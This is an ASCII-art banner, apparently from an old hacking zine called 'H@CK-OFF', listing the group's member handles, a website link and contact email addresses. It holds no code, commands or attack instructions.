			    _____________________________________
			    (((((((      H@CK-OFF !!     ))))))))
			     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			    ~  ~   ¤º°`°º   ¤º°`°º   ¤º°`°º  ~  ~ 
			     ~  ~  | SE | - | RI | - | AL | ~  ~ 
			    ~  ~   | SA | - | VA | - | TE |  ~  ~ 
			     ~  ~  | SY | - | ST | - | EM | ~  ~ 
			    ~  ~   ø,¸¸,ø   ø,¸¸,ø   ø,¸¸,ø  ~  ~ 
			     Cakeii - Tobozo - Yopyop - Silk - Nk
			            Sniffdoz - Aolshame
			     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			                             {    \|/    
			     >http://come.to/legang  8  -- * --
			     >silk@silk.cut          {    /|\  
			     cakeii@usa.net 
			     nk01@n0past.com 
			     tobozo@biosys.net  
			     sniffdoz@yahoo.com
			     yopyop@webmails.com
			     aolshame@softhome.net
                       emminence@earthling.net
		        ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,    
		       /   O o          O o          O o    \   
		       \    O            O            O     /   
		        º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º     
		    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EOF